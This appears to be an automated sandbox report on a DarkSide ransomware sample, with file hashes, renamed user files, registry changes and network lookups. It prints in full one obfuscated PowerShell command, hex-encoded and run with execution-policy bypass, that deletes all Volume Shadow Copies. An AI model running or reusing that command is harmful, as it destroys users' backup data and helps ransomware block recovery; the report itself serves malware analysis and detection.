| SHA512 | 12ed22537dcc79d53f6c7d39e92a38f8fea076d793198928f5b7a5dd1234d50a3c0b4815632f3fadf8bc4ef0499773d22bd83f961d2d0ffd8afacf471bd3a5ae |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
| MD5 | 9da04288eaee7f27f19509adab997810 |
| SHA1 | f6ecd2dacd5283e436d91dc2f5114b110a7b2e1e |
| SHA256 | 30684ee7baee4e2c22de3c5d62c8469606ad9088269ca96d6d44ee056ea6d5bd |
| SHA512 | 7e64b31db28c7caf18e4fb9f0d8698851936584fb78db02a92199faeee36120eb43570f16b7912a2de2749456d4cbeaedc3680fdaeeaa09e5d1bc7b15e11b0fa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal
| MD5 | 7cb0dccfef4d130ce7d47a749d054dc4 |
| SHA1 | 4f664de80dc5f4f65fc286bdc75964e11bbefe49 |
| SHA256 | 804b0dc09f381e21f0441925fd6987944d77ac78e8a922649b4cd2f71ff58355 |
| SHA512 | b037427a5decb092db2d3f8b55d67e9c751d48dba822d729a2ebf0b7bb2a8a76c60b6093a4399b7e9452baa2c38031671e445075f384832044d2e8cfcb1d8d90 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
| MD5 | 0eb80653c1f50a5416b4c34a66dd7287 |
| SHA1 | 324f78cb5e36f3fe83dd751380552e9b1aabc2cd |
| SHA256 | 4371a3b88885f0377c44f86aefaef639952394823d574838d72cdf4845e1014d |
| SHA512 | 24fd378028da51b2eb6dc9fc5f925916d5e0fc2bee45ca2488bc1c76b9617836bc4bb1df0fa7c411e5c086ee9ce935c94a9448b3fc6474d5cd7afafe574f4aa2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG
| MD5 | 4e6b9fb40c519dfb5ad09840080776e3 |
| SHA1 | db5a428cfda4864128678ac31fa64d19267807ce |
| SHA256 | 07a83533cb26ce9d769df0c669b7a13ca1fec4fdbbc4f144a883f6e5f250db16 |
| SHA512 | 7b837a25c34e476655697ca20e474cbaa86847035234eee5f38074cea74763d08d8bdb603984e1857537cae51149e4203db6911fa35819db623852aebc5fbaa7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log
| MD5 | fa1af62bdaf3c63591454d2631d5dd6d |
| SHA1 | 14fc1fc51a9b7ccab8f04c45d84442ed02eb9466 |
| SHA256 | 00dd3c8077c2cca17ea9b94804490326ae6f43e6070d06b1516dfd5c4736d94d |
| SHA512 | 2c3184f563b9a9bff088114f0547f204ee1e0b864115366c86506215f42d7dbf161bc2534ccaee783e62cc01105edffc5f5dabf229da5ebd839c96af1d45de77 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 773f2fcd5b74a35cbb85ef5f308e5e58 |
| SHA1 | 20f82e79668c02efc12b21bbb2a1a7bf7c74b8e3 |
| SHA256 | cb47593c0dbf43149dd468e07547d96ef4a72862010906f41a86aa4b985270b1 |
| SHA512 | 4a8800076ed00ef2f172355cab1f90efd86bbbc9e2f1cd402940b2066ca5e7cec6acf2da60c38baa7bf039da3b0bb29a01553838d3e142cc34dfb66578c2642b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 824b0ec1a4aef15d2a357de90b404fcd |
| SHA1 | 906ad4d42f6cd892da7ffc75d01fb1abc276ac81 |
| SHA256 | ffa87a57d8bde50cd0842877894e10f9777a766f925c36297cd4102fee31b98d |
| SHA512 | 24e88cfccdba8e55c21980e0b614e11d33e87bb5841ec6ae35fb64227a15a6dfcad3f4b14c38ec8584f01d280449160937f617ca1d8cdbbaf45a079394b0d9de |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG
| MD5 | 15554c3069a5ab63eca4b4bee420ad11 |
| SHA1 | 6ecdff4345fbd251ccf91889486d0426057627c5 |
| SHA256 | e70e839b4cf998dfa2cd62474c1aca82f998dcc23e6f312189236ddc8fe4983d |
| SHA512 | 25de143dceb4659baf36ab14386427299dc67757298f4f6312a41d080b1d43aae58ab10fa98e2978c2078131171cb87a996c68d85cb81db02f4e9e76cf4650ef |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13287626619086400
| MD5 | 840af2bf59083860db33f884c66b040c |
| SHA1 | 56658a8465bb0aaef3bbc325c09cd1b69048a904 |
| SHA256 | c14a2f41ee01779df91c239e87f7fc6f952d4f69ddac2fa93b9a6337955ae7b9 |
| SHA512 | af76c5cc19ccb1044e5f88b30683b3f3098b85212a3d4fb2180c4972e8853068e104339e5c746a83dc03ae4aba9b96419bb8fe9858914be953995b3f362ac8e6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13287626619848400
| MD5 | 269b0fce0cd8b92a09b92441e3d5d812 |
| SHA1 | 685431016488755bda152b15254d3e555b4b1a15 |
| SHA256 | d1261f7ccad90515107d41df5c9b23b409b6cb210f759aa9d06963df0710a16f |
| SHA512 | 7262815888283f7d60617d34daae233ad33335a0128d57dde5beb24d443910922f0b53aaf64d46a58e52ce4121c846e9016cd02c444745636e7c4b3276bf9868 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
| MD5 | e157d534c7693880ab1a318166f68c44 |
| SHA1 | 3791ed384bbe52c2624438bab37af422179bea66 |
| SHA256 | 71725cc6fa90a65ac8a2e3b45c5d03aa4e279e02eb4c49a1b6f3ce33d5b78c4d |
| SHA512 | e54efa23fafbeaf6ec75e0a598c4a68663693dc9108fea72316afab9d783d3735f08d075f2b253f4620acaa2c8b86921bbceac1cbe35c2e2b550cb4722e4ac72 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
| MD5 | 0d9f70652007603a81c7847dc3cee8da |
| SHA1 | 4a7c8341cfd657f31314690bfd9bd8f51030c5b5 |
| SHA256 | a705d9d26ed11df2f38e6c25557ccb83916b8598fe92d2ad25868f9ae89844f7 |
| SHA512 | 27e34f4b5077a9bb58f30d2447c43d2ae877495bda975b33f405d5d08d03a009bf67bd24abcf70838934f17f1ec66ed1b98429ad96997cae68d0f1e0bf9ea4cc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
| MD5 | 2cf5c8c911eee4269a7cfc06889d9e9d |
| SHA1 | fa6ef6012ea7f3ddd683b68cd82d83dc73460031 |
| SHA256 | 086507bf5db9cd193fbe59605a1f13ddc880d33c3efa340bfa3bebfe11e27353 |
| SHA512 | c834b563e3f5c6fc0ddd11d73b87fd4eaf16b838754bdace4094fa1f293714049b29f90bb42e79d643bd28cf79108443de0b1625501a64534262d67cf899c197 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | 66950e3c3e5f6035163261a735b9fae0 |
| SHA1 | b9018ce6ba3bf763974ecc8866e28be1f0c3c244 |
| SHA256 | 00dfed089890350ecc2ac2b06db31d403bfff4c6d347d871499b4610fc134979 |
| SHA512 | fc11b7dcdc51545d62d87b205a801b17fae3fb427134ea8906723c637ff393ddd2ab0919e06fdb02bc74703c4aa4c51029aa4119cc721ace00085652b2194f13 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
| MD5 | b63048c4e7e52c52053d25da30d9c5ab |
| SHA1 | 679a44d402f5ec24605719e06459f5a707989187 |
| SHA256 | 389caa40ea458e84bc624a9af1e0dec60fa652b2db2b81c09b1dfe22822cc3d1 |
| SHA512 | e86c58c5a25e24f21ad79ed526a90c120a09c115f4820663bd2ebbc59e7bb1c4c418267eb77645522aa20b2c1b53fba8e31690db7bae9b21e4eff3db06316359 |
C:\Users\Admin\AppData\Local\Temp\075365ae-37de-4c56-b42e-4fed804cdf67.tmp
| MD5 | 19c0d737d50feec0112fb4a48329ff04 |
| SHA1 | 8d58269c40e217e4ebe82fadc27110e7930cfebe |
| SHA256 | f519a32686ace222a22aea7c302d5bf351d0134dfbdc906582e0a4669901cfac |
| SHA512 | 02de852ba2340aab4a978be9332e26035b00e05e5638f58deaed0fe0f39944fa01781d22ba3a692505c87c3a1d212e29fac0e6995e7e2edb5421fe5d069922a3 |
C:\Users\Admin\AppData\Local\Temp\2bd9593e-631d-4f41-b9e1-62ae67fc52ca.tmp
| MD5 | 2751ccef058d0cae0f78664bf150000e |
| SHA1 | 5fa719bbbf9fca57bd41eedd342710201ae6d160 |
| SHA256 | 1c8f3555eeb92dbde479755ced7ccbf3337fa93358e0d32890813bcdd43b65f3 |
| SHA512 | 7974566578614606816c6022d7817e4bca95c336accdd1f5985b13673c15190887eea0ad76b4d8987637fa9c2b2bdeeac6f9c921e1ee26924ad323e6a99d12fb |
C:\Users\Admin\AppData\Local\Temp\1448c634-9788-4297-8cfe-538428696765.tmp
| MD5 | 541f52e24fe1ef9f8e12377a6ccae0c0 |
| SHA1 | 189898bb2dcae7d5a6057bc2d98b8b450afaebb6 |
| SHA256 | 81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82 |
| SHA512 | d779d78a15c5efca51ebd6b96a7ccb6d718741bdf7d9a37f53b2eb4b98aa1a78bc4cfa57d6e763aab97276c8f9088940ac0476690d4d46023ff4bf52f3326c88 |
C:\Users\Admin\AppData\Local\Temp\d3cb9278-7b02-4be2-b492-56cc5b0c64df.tmp
| MD5 | f1140ebc420176d428c7e6cfac726733 |
| SHA1 | 9f0ee1215624c03964974d366ef0813849dd5ca0 |
| SHA256 | f388e99f7df063dcbad923c85976b36d7e9c267750653c95ac7c13b2b122371c |
| SHA512 | ee6bde45b1f14bd1994139b82fcaae5bd6ef80bf24f080cfc503adfaf400d7714270ac1974f41df6f3e8b8abe2b93b19d4a0edef8dd3a10517d896b7f60e761c |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 1c50c2115d4fbdf82136c7743b327842 |
| SHA1 | 9bc645a9588e40b8ec41b17a15ca5771a4446f82 |
| SHA256 | e4885ffdef1fb72e2808cb1cf4f3719a6ab98528bc869a415da3dcd7bf7f2c4c |
| SHA512 | d5de7c24f1099a81297a699218c73cd1d5cdc50d436f6cede4505c9bff2cf881143a945ec389d34564b11e9fc59430ef841358d1c37f79bb7ff9872918d37847 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-25 23:22
Reported
2022-01-25 23:29
Platform
win10-en-20211208
Max time kernel
121s
Max time network
360s
Command Line
Signatures
DarkSide
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\LimitGrant.crw => C:\Users\Admin\Pictures\LimitGrant.crw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UseCompare.png.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ExitResume.raw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RegisterSwitch.crw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UseCompare.png => C:\Users\Admin\Pictures\UseCompare.png.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\AssertRedo.raw => C:\Users\Admin\Pictures\AssertRedo.raw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\BlockMount.tiff => C:\Users\Admin\Pictures\BlockMount.tiff.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ExitResume.raw => C:\Users\Admin\Pictures\ExitResume.raw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertFromInvoke.png => C:\Users\Admin\Pictures\ConvertFromInvoke.png.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ConvertFromInvoke.png.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\LimitGrant.crw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RegisterSwitch.crw => C:\Users\Admin\Pictures\RegisterSwitch.crw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\AssertRedo.raw.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\BlockMount.tiff | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\BlockMount.tiff.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\82ee2099.BMP" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\82ee2099.BMP" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.82ee2099\ = "82ee2099" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\82ee2099.ico" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2812 wrote to memory of 3732 | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2812 wrote to memory of 3732 | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\mal.exe
"C:\Users\Admin\AppData\Local\Temp\mal.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 52.109.8.19:443 | tcp | |
| US | 8.8.8.8:53 | catsdegree.com | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
| NL | 67.26.111.254:80 | tcp | |
| US | 8.8.8.8:53 | 87.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.1.127.10.in-addr.arpa | udp |
